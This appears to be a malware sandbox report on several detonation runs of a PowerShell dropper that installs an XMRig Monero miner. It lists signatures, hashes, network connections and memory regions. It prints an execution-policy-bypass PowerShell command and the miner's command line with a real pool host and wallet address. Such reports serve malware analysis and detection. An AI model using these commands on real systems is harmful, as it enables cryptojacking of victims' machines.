| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2272 wrote to memory of 768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2272 wrote to memory of 768 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.178.89.13.in-addr.arpa | udp |
Files
memory/2272-0-0x00007FF942E73000-0x00007FF942E75000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5metjbn.jfh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2272-1-0x0000018A62600000-0x0000018A62622000-memory.dmp
memory/2272-11-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/2272-12-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/2272-14-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/2272-15-0x0000018A7B920000-0x0000018A7B932000-memory.dmp
memory/2272-16-0x0000018A7ABA0000-0x0000018A7ABAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/768-47-0x000002990AE30000-0x000002990AE50000-memory.dmp
memory/768-48-0x000002999CEB0000-0x000002999CED0000-memory.dmp
memory/768-49-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-53-0x000002999D520000-0x000002999D540000-memory.dmp
memory/768-52-0x000002999D2F0000-0x000002999D310000-memory.dmp
memory/2272-51-0x00007FF942E73000-0x00007FF942E75000-memory.dmp
memory/768-50-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/2272-54-0x00007FF942E70000-0x00007FF943931000-memory.dmp
memory/768-55-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-56-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-57-0x000002999D2F0000-0x000002999D310000-memory.dmp
memory/768-58-0x000002999D520000-0x000002999D540000-memory.dmp
memory/768-59-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-60-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-61-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-62-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-63-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-64-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-65-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-66-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-67-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-68-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-69-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-70-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-71-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-72-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-73-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-74-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-75-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-76-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-77-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-78-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-79-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-80-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-81-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-82-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-83-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-84-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-85-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-86-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-87-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-88-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-89-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-90-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-91-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-92-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-93-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-94-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-95-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-96-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-97-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-98-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-99-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-100-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-101-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-102-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-103-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-104-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-105-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-106-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-107-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-108-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-109-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-110-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-111-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-112-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-113-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-114-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-115-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-116-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
memory/768-117-0x00007FF6E4800000-0x00007FF6E5433000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1786s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1260 wrote to memory of 4412 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1260 wrote to memory of 4412 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/1260-0-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp
memory/1260-5-0x000001523CCA0000-0x000001523CCC2000-memory.dmp
memory/1260-8-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-9-0x00000152552D0000-0x0000015255346000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rxhdinlh.0jg.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/1260-10-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-26-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/1260-49-0x0000015255290000-0x00000152552A2000-memory.dmp
memory/1260-62-0x000001523CCE0000-0x000001523CCEA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4412-91-0x0000023D69020000-0x0000023D69040000-memory.dmp
memory/4412-92-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/1260-94-0x00007FFDC79F3000-0x00007FFDC79F4000-memory.dmp
memory/4412-93-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/1260-95-0x00007FFDC79F0000-0x00007FFDC83DC000-memory.dmp
memory/4412-96-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-97-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-98-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-99-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-100-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-101-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-102-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-103-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-104-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-105-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-106-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-107-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-108-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-109-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-110-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-111-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-112-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-113-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-114-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-115-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-116-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-117-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-118-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-119-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-120-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-121-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-122-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-123-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-124-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-125-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-126-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-127-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-128-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-129-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-130-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-131-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-132-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-133-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-134-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-135-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-136-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-137-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-138-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-139-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-140-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-141-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-142-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-143-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-144-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-145-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-146-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-147-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-148-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-149-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-150-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-151-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-152-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-153-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-154-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-155-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
memory/4412-156-0x00007FF760CF0000-0x00007FF761923000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:02
Platform
win10v2004-20240611-en
Max time kernel
1799s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2136 wrote to memory of 4908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2136 wrote to memory of 4908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
